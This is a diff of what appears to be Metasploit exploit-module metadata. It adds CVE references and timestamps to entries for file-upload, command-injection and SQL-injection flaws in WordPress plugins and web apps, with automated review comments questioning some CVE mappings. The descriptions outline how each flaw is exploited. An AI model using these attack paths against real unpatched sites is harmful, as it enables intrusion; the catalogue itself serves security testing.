"description": "This module exploits a previously unpublished vulnerability in the\n Dogfood CRM mail function which is vulnerable to command injection\n in the spell check feature. Because of character restrictions, this\n exploit works best with the double-reverse telnet payload. This\n vulnerability was discovered by LSO and affects v2.0.10.",
"references": [
"CVE-2009-20010",
"OSVDB-54707",
"URL-http://downloads.sourceforge.net/dogfood/"
],
@@ -134045,7 +135201,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/dogfood_spell_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/dogfood_spell_exec",
@@ -134338,6 +135494,7 @@
],
"description": "This module exploits a vulnerability found in EGallery 1.2 By abusing the\n uploadify.php file, a malicious user can upload a file to the egallery/ directory\n without any authentication, which results in arbitrary code execution. The module\n has been tested successfully on Ubuntu 10.04.",
"references": [
"CVE-2012-10052",
"OSVDB-83891",
"BID-54464",
"URL-http://web.archive.org/web/20170128123244/http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html"
@@ -134363,7 +135520,7 @@
"targets": [
"EGallery 1.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/egallery_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/egallery_upload_exec",
@@ -134458,6 +135615,7 @@
],
"description": "This module exploits a file upload vulnerability found in FlashChat\n versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload\n feature in order to upload malicious PHP files without authentication\n which results in arbitrary remote code execution as the web server user.",
"references": [
"CVE-2013-10038",
"OSVDB-98233",
"EDB-28709"
],
@@ -134482,7 +135640,7 @@
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/flashchat_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/flashchat_upload_exec",
@@ -134660,7 +135818,7 @@
"Automatic (Unix In-Memory)",
"Automatic (Linux Dropper)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-08 10:45:59 +0000",
"path": "/modules/exploits/unix/webapp/fusionpbx_exec_cmd_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/fusionpbx_exec_cmd_exec",
@@ -134808,6 +135966,7 @@
],
"description": "This module exploits a file upload vulnerability in GetSimple CMS. By abusing the\n upload.php file, a malicious authenticated user can upload an arbitrary file,\n including PHP code, which results in arbitrary code execution.",
"references": [
"CVE-2013-10032",
"EDB-25405",
"OSVDB-93034"
],
@@ -134832,7 +135991,7 @@
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/get_simple_cms_upload_exec",
@@ -135100,6 +136259,7 @@
],
"description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.",
"references": [
"CVE-2013-10055",
"OSVDB-94405",
"EDB-26243"
],
@@ -135125,7 +136285,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/havalite_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/havalite_upload_exec",
@@ -135219,6 +136379,7 @@
],
"description": "This module exploits a PHP code execution vulnerability in\n HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'\n is not removed after installation allowing unauthenticated users to\n write PHP code to the application configuration file 'config.php'.\n\n Note: This exploit will overwrite the application configuration file\n rendering the application unusable.",
"references": [
"CVE-2014-125116",
"EDB-34273",
"OSVDB-109838"
],
@@ -135243,7 +136404,7 @@
"targets": [
"HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/hybridauth_install_php_exec",
@@ -135278,6 +136439,7 @@
],
"description": "This module exploits an arbitrary PHP command execution vulnerability because of a\n dangerous use of eval() in InstantCMS in versions 1.6 and prior.",
"references": [
"CVE-2013-10051",
"BID-60816",
"PACKETSTORM-122176"
],
@@ -135302,7 +136464,7 @@
"targets": [
"InstantCMS 1.6"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/instantcms_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/instantcms_exec",
@@ -135825,6 +136987,7 @@
],
"description": "This module exploits a SQL injection vulnerability in Kimai version\n 0.9.2.x. The 'db_restore.php' file allows unauthenticated users to\n execute arbitrary SQL queries. This module writes a PHP payload to\n disk if the following conditions are met: The PHP configuration must\n have 'display_errors' enabled, Kimai must be configured to use a\n MySQL database running on localhost; and the MySQL user must have\n write permission to the Kimai 'temporary' directory.",
"references": [
"CVE-2013-10033",
"EDB-25606",
"OSVDB-93547"
],
@@ -135849,7 +137012,7 @@
"targets": [
"Kimai version 0.9.2.x (PHP Payload)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/kimai_sqli.rb",
"is_install_path": true,
"ref_name": "unix/webapp/kimai_sqli",
@@ -135883,6 +137046,7 @@
],
"description": "This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and\n possibly prior. Attackers can bypass the file extension check and abuse the upload\n feature in order to upload a malicious PHP file without authentication, which\n results in arbitrary remote code execution.",
"references": [
"CVE-2013-10054",
"OSVDB-94391",
"EDB-26213"
],
@@ -135908,7 +137072,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/libretto_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/libretto_upload_exec",
@@ -136174,6 +137338,7 @@
],
"description": "myBB is a popular open source PHP forum software. Version 1.6.4 contained an\n unauthorized backdoor, distributed as part of the vendor's source package.",
"references": [
"CVE-2011-10018",
"OSVDB-76111",
"BID-49993",
"URL-http://web.archive.org/web/20121010011259/http://secunia.com/advisories/46300/"
@@ -136199,7 +137364,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/mybb_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/webapp/mybb_backdoor",
@@ -136353,6 +137518,7 @@
],
"description": "This module exploits a vulnerability found in Nagios XI Network Monitor's\n component 'Graph Explorer'. An authenticated user can execute system commands\n by injecting it in several parameters, such as in visApi.php's 'host' parameter,\n which results in remote code execution.",
"references": [
"CVE-2012-10029",
"OSVDB-83552",
"BID-54263",
"PACKETSTORM-118497"
@@ -136378,7 +137544,7 @@
"targets": [
"Graph Explorer Component prior to 1.3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/nagios_graph_explorer.rb",
"is_install_path": true,
"ref_name": "unix/webapp/nagios_graph_explorer",
@@ -136412,6 +137578,7 @@
],
"description": "This module exploits a vulnerability found in Narcissus image configuration\n function. This is due to the backend.php file not handling the $release parameter\n properly, and then passes it on to the configure_image() function. In this\n function, the $release parameter can be used to inject system commands for\n passthru (a PHP function that's meant to be used to run a bash script by the\n vulnerable application), which allows remote code execution under the context\n of the web server.",
"references": [
"CVE-2012-10033",
"EDB-22709",
"OSVDB-87410"
],
@@ -136436,7 +137603,7 @@
"targets": [
"Narcissus"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/narcissus_backend_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/narcissus_backend_exec",
@@ -136598,6 +137765,7 @@
],
"description": "This module exploits a vulnerability found in OpenEMR version 4.1.1 Patch 14 and lower.\n When logging in as any non-admin user, it's possible to retrieve the admin SHA1 password\n hash from the database through SQL injection. The SQL injection vulnerability exists\n in the \"new_comprehensive_save.php\" page. This hash can be used to log in as the admin\n user. After logging in, the \"manage_site_files.php\" page will be used to upload arbitrary\n code.",
"references": [
"CVE-2013-10044",
"OSVDB-97482",
"EDB-28329"
],
@@ -136622,7 +137790,7 @@
"targets": [
"OpenEMR"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openemr_sqli_privesc_upload",
@@ -136835,6 +138003,7 @@
],
"description": "This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.",
"references": [
"CVE-2019-25065",
"EDB-47691"
],
"platform": "Linux",
@@ -136858,7 +138027,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb",
"is_install_path": true,
"ref_name": "unix/webapp/opennetadmin_ping_cmd_injection",
@@ -137196,6 +138365,7 @@
],
"description": "osCommerce is a popular open source E-Commerce application.\n The admin console contains a file management utility that\n allows administrators to upload, download, and edit files.\n This could be abused to allow unauthenticated attackers to\n execute arbitrary code with the permissions of the\n webserver.",
"references": [
"CVE-2009-20006",
"OSVDB-60018",
"EDB-9556"
],
@@ -137220,7 +138390,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/oscommerce_filemanager.rb",
"is_install_path": true,
"ref_name": "unix/webapp/oscommerce_filemanager",
@@ -137314,6 +138484,7 @@
],
"description": "This module exploits a PHP code execution vulnerability in php-Charts\n version 1.0 which could be abused to allow users to execute arbitrary\n PHP code under the context of the webserver user. The 'url.php' script\n calls eval() with user controlled data from any HTTP GET parameter name.",
"references": [
"CVE-2013-10070",
"OSVDB-89334",
"BID-57448",
"EDB-24201"
@@ -137339,7 +138510,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/php_charts_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_charts_exec",
@@ -137786,6 +138957,7 @@
],
"description": "This module will generate a plugin, pack the payload into it\n and upload it to a server running Piwik. Superuser Credentials are\n required to run this module. This module does not work against Piwik 1\n as there is no option to upload custom plugins. Piwik disabled\n custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you\n have to enable custom plugin uploads via the config file.\n Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.",
"references": [
"CVE-2025-34104",
"URL-https://firefart.at/post/turning_piwik_superuser_creds_into_rce/",
"URL-https://piwik.org/faq/plugins/faq_21/",
"URL-https://piwik.org/changelog/piwik-3-0-3/"
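Review bot: CVE-2025-34104 is being attached to an entry whose description characterises the behaviour as a documented feature (custom plugin upload that requires Superuser credentials and, from 3.0.3 onward, must be explicitly enabled in the config file), and whose other references are a blog post and two Piwik FAQ/changelog pages rather than an advisory; before this ships as the first reference, confirm the CVE text covers superuser plugin upload in Piwik 2.14 to 3.0.1 so the identifier does not imply a distinct unauthenticated flaw.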
@@ -137811,7 +138983,7 @@
"targets": [
"Piwik"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/piwik_superuser_plugin_upload",
@@ -137845,6 +139017,7 @@
],
"description": "This module exploits a vulnerability found in Project Pier. The application's\n uploading tool does not require any authentication, which allows a malicious user\n to upload an arbitrary file onto the web server, and then cause remote code\n execution by simply requesting it. This module is known to work against Apache\n servers due to the way it handles an extension name, but the vulnerability may\n not be exploitable on others.",
"references": [
"CVE-2012-10036",
"OSVDB-85881",
"EDB-21929",
"PACKETSTORM-117070"
@@ -137871,7 +139044,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/projectpier_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/projectpier_upload_exec",
@@ -137905,6 +139078,7 @@
],
"description": "This module exploits a file upload vulnerability in ProjectSend\n revisions 100 to 561. The 'process-upload.php' file allows\n unauthenticated users to upload PHP files resulting in remote\n code execution as the web server user.",
"references": [
"CVE-2014-9567",
"EDB-35424"
],
"platform": "PHP",
@@ -137928,7 +139102,7 @@
"targets": [
"ProjectSend (PHP Payload)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/projectsend_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/projectsend_upload_exec",
@@ -138198,6 +139372,7 @@
],
"description": "This module exploits a file upload vulnerability found in Simple\n E-Document versions 3.0 to 3.1. Attackers can bypass authentication and\n abuse the upload feature in order to upload malicious PHP files which\n results in arbitrary remote code execution as the web server user. File\n uploads are disabled by default.",
"references": [
"CVE-2014-125126",
"EDB-31142"
],
"platform": "PHP",
@@ -138221,7 +139396,7 @@
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/simple_e_document_upload_exec",
@@ -138546,6 +139721,7 @@
],
"description": "This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23\n which could be abused to allow unauthenticated users to execute arbitrary PHP code with\n the permissions of the webserver. The dangerous unserialize() call exists in the\n '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()\n method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.",
"references": [
"CVE-2025-25034",
"URL-http://karmainsecurity.com/KIS-2016-07",
"URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-001",
"URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-008",
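Review bot: the added CVE-2025-25034 carries a 2025 year while every other reference in this entry (KIS-2016-07, sugarcrm-sa-2016-001, sugarcrm-sa-2016-008) and the affected range (SugarCRM CE <= 6.5.23) point to a 2016-era issue; late assignment of IDs to older bugs does happen, but a reviewer should verify that this ID resolves to the SugarRestSerialize.php unserialize() flaw described above and not to a newer SugarCRM advisory, since it is inserted as the primary reference.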
@@ -138572,7 +139748,7 @@
"targets": [
"SugarCRM CE <= 6.5.23"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sugarcrm_rest_unserialize_exec",
@@ -138906,6 +140082,7 @@
],
"description": "This module exploits a file upload vulnerability in Tiki Wiki <= 15.1\n which could be abused to allow unauthenticated users to execute arbitrary code\n under the context of the web server user.\n\n The issue comes with one of the 3rd party components. Name of that component is\n ELFinder -version 2.0-. This component comes with default example page which\n demonstrates file operations such as upload, remove, rename, create directory etc.\n Default configuration does not force validations such as file extension, content-type etc.\n Thus, unauthenticated user can upload PHP file.\n\n The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.",
"references": [
"CVE-2025-34111",
"URL-https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability",
"URL-https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released"
],
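Review bot: CVE-2025-34111 is inserted as the first reference for a Tiki Wiki <= 15.1 ELFinder upload issue whose other two references (the mehmetince.net write-up and the Tiki 15.2 / 14.4 / 12.9 security release note) predate 2025 by years; please check that the ID maps to this specific ELFinder example-page upload rather than another Tiki upload issue, as the year mismatch is the kind of thing a later reader will otherwise flag as a typo.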
@@ -138930,7 +140107,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_upload_exec",
@@ -139562,6 +140739,7 @@
],
"description": "This module exploits a vulnerability in VICIdial versions\n 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users\n to execute arbitrary operating system commands as the web\n server user if password encryption is enabled (disabled\n by default).\n\n When password encryption is enabled the user's password\n supplied using HTTP basic authentication is used in a call\n to exec().\n\n This module has been tested successfully on version 2.11 RC2\n and 2.13 RC1 on CentOS.",
"references": [
"CVE-2025-34099",
"URL-http://www.vicidial.org/VICIDIALmantis/view.php?id=1016"
],
"platform": "Unix",
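Review bot: the only identifier added here, CVE-2025-34099, sits next to a VICIDIALmantis ticket (id 1016) and an affected range of 2.9 RC1 to 2.13 RC1, so it is presumably a retroactively assigned ID; the mapping should be checked against that mantis ticket (password-encryption path passing the HTTP basic-auth password to exec()) before merge, since the description itself never mentions a CVE and the two sources should agree.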
@@ -139585,7 +140763,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/vicidial_user_authorization_unauth_cmd_exec",
@@ -139738,6 +140916,7 @@
],
"description": "This module exploits a command execution vulnerability in WebTester\n version 5.x. The 'install2.php' file allows unauthenticated users to\n execute arbitrary commands in the 'cpusername', 'cppassword' and\n 'cpdomain' parameters.",
"references": [
"CVE-2013-10037",
"OSVDB-98750",
"URL-https://sourceforge.net/p/webtesteronline/bugs/3/"
],
@@ -139762,7 +140941,7 @@
"targets": [
"WebTester version 5.x"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/webtester_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/webtester_exec",
@@ -139849,6 +141028,7 @@
],
"description": "This module exploits a remote file inclusion flaw in the WordPress blogging\n software plugin known as Advanced Custom Fields. The vulnerability allows for remote\n file inclusion and remote code execution via the export.php script. The Advanced\n Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only\n works when the php option allow_url_include is set to On (Default Off).",
"references": [
"CVE-2012-10025",
"OSVDB-87353",
"URL-http://web.archive.org/web/20121223025326/http://secunia.com:80/advisories/51037",
"WPVDB-6103"
@@ -139874,7 +141054,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_advanced_custom_fields_exec",
@@ -139908,6 +141088,7 @@
],
"description": "This module exploits an arbitrary file upload in the WordPress Ajax Load More\n version 2.8.1.1. It allows to upload arbitrary php files and get remote code\n execution. This module has been tested successfully on WordPress Ajax Load More\n 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.",
"references": [
"CVE-2015-10140",
"WPVDB-8209"
],
"platform": "PHP",
@@ -139931,7 +141112,7 @@
"targets": [
"Ajax Load More 2.8.1.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_ajax_load_more_file_upload",
@@ -139965,6 +141146,7 @@
],
"description": "This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress\n plugin. By abusing the upload.php file, a malicious user can upload a file to a\n temp directory without authentication, which results in arbitrary code execution.",
"references": [
"CVE-2012-10026",
"OSVDB-82653",
"BID-53809",
"EDB-18993",
@@ -139992,7 +141174,7 @@
"targets": [
"asset-manager <= 2.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_asset_manager_upload_exec",
@@ -140026,6 +141208,7 @@
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Creative Contact\n Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"CVE-2014-8739",
"EDB-35057",
"OSVDB-113669",
"WPVDB-7652"
@@ -140051,7 +141234,7 @@
"targets": [
"Creative Contact Form 0.9.7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_creativecontactform_file_upload",
@@ -140202,6 +141385,7 @@
],
"description": "This module exploits an arbitrary PHP code execution flaw in the WordPress\n blogging software plugin known as Foxypress. The vulnerability allows for arbitrary\n file upload and remote code execution via the uploadify.php script. The Foxypress\n plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.",
"references": [
"CVE-2012-10020",
"EDB-18991",
"BID-53805",
"WPVDB-6231"
@@ -140227,7 +141411,7 @@
"targets": [
"Foxypress 0.4.1.1 - 0.4.2.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_foxypress_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_foxypress_upload",
@@ -140261,6 +141445,7 @@
],
"description": "The WordPress Front-end Editor plugin contains an authenticated file upload\n vulnerability. An attacker can upload arbitrary files to the upload folder because\n the plugin uses its own file upload mechanism instead of the WordPress API, which\n incorrectly allows uploads of any file type.",
"references": [
"CVE-2012-10019",
"OSVDB-83637",
"WPVDB-7569",
"URL-http://web.archive.org/web/20170203203305/http://www.opensyscom.fr:80/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html"
@@ -140286,7 +141471,7 @@
"targets": [
"Front-End Editor 2.2.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_frontend_editor_file_upload",
@@ -140497,6 +141682,7 @@
],
"description": "This module exploits an authentication bypass in the WordPress\n InfiniteWP Client plugin to log in as an administrator and execute\n arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.\n\n The module will attempt to retrieve the original PLUGIN_FILE contents\n and restore them after payload execution. If VerifyContents is set,\n which is the default setting, the module will check to see if the\n restored contents match the original.\n\n Note that a valid administrator username is required for this module.\n\n WordPress >= 4.9 is currently not supported due to a breaking WordPress\n API change. Tested against 4.8.3.",
"references": [
"CVE-2020-8772",
"WPVDB-10011",
"URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
"URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
@@ -140523,7 +141709,7 @@
"targets": [
"InfiniteWP Client < 1.9.4.5"
],
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
@@ -140678,6 +141864,7 @@
],
"description": "WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-content/plugins/wp-mobile-detector/resize.php script does contains a\n remote file include for files not cached by the system already.\n By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.",
"references": [
"CVE-2016-15043",
"WPVDB-8505",
"EDB-39891",
"URL-https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/"
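Review bot: unrelated to the reference being added, the description context line reads "resize.php script does contains a remote file include", which should be "does contain" or simply "contains"; as with the rest of this generated file, the correction belongs in the module source rather than in this JSON.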
@@ -140703,7 +141890,7 @@
"targets": [
"wp-mobile-detectory < 3.6"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_mobile_detector_upload_execute",
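Review bot: the unchanged targets context line "wp-mobile-detectory < 3.6" looks like a typo for "wp-mobile-detector", which is the plugin name used in the description and the module path; since this file is generated from module metadata, the fix belongs in the targets definition of wp_mobile_detector_upload_execute.rb, after which the next metadata regeneration will pick it up.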
@@ -140737,6 +141924,7 @@
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form\n plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"CVE-2015-10137",
"URL-http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/",
"WPVDB-7896"
],
@@ -140761,7 +141949,7 @@
"targets": [
"N-Media WebSite Contact Form 1.3.4"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_nmediawebsite_file_upload",
@@ -140974,6 +142162,7 @@
],
"description": "This module uses an authentication bypass vulnerability in\n Wordpress Plugin Pie Register <= 3.7.1.4 to generate a valid cookie.\n With this cookie, hopefully of the admin, it will generate a plugin,\n pack the payload into it and upload it to a server running WordPress.",
"references": [
"CVE-2025-34077",
"EDB-50395"
],
"platform": "PHP",
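Review bot: CVE-2025-34077 is listed alongside EDB-50395 as the only references for a Pie Register <= 3.7.1.4 authentication bypass; with no vendor advisory in the list, please confirm the CVE describes this same bypass (a valid cookie generated without credentials) and not another Pie Register advisory, and note that the description's "hopefully of the admin" leaves the obtained privilege level ambiguous, which the module source could state more precisely.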
@@ -140997,7 +142186,7 @@
"targets": [
"WordPress"
],
"mod_time": "2022-10-03 19:50:04 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_pie_register_bypass_rce",
@@ -141150,6 +142339,7 @@
],
"description": "The WordPress Theme \"platform\" contains a remote code execution vulnerability\n through an unchecked admin_init call. The theme includes the uploaded file\n from its temp filename with php's include function.",
"references": [
"CVE-2015-10143",
"URL-http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html",
"WPVDB-7762"
],
@@ -141174,7 +142364,7 @@
"targets": [
"platform < 1.4.4, platform pro < 1.6.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_platform_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_platform_exec",
@@ -141208,6 +142398,7 @@
],
"description": "This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress\n plugin. By abusing the uploadify.php file, a malicious user can upload a file to a\n temp directory without authentication, which results in arbitrary code execution.",
"references": [
"CVE-2012-10027",
"OSVDB-82656",
"BID-53787",
"EDB-18987",
@@ -141235,7 +142426,7 @@
"targets": [
"wp-property <= 1.35.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_property_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_property_upload_exec",
@@ -141449,6 +142640,7 @@
],
"description": "WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-symposium/server/file_upload_form.php script does not properly verify or\n sanitize user-uploaded files. By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.",
"references": [
"CVE-2014-10021",
"OSVDB-116046",
"WPVDB-7716"
],
@@ -141473,7 +142665,7 @@
"targets": [
"wp-symposium < 14.12"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_symposium_shell_upload",
@@ -141571,6 +142763,7 @@
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,\n version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"CVE-2015-10138",
"WPVDB-7883",
"EDB-36640",
"PACKETSTORM-131294"
@@ -141596,7 +142789,7 @@
"targets": [
"Work The Flow 2.5.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
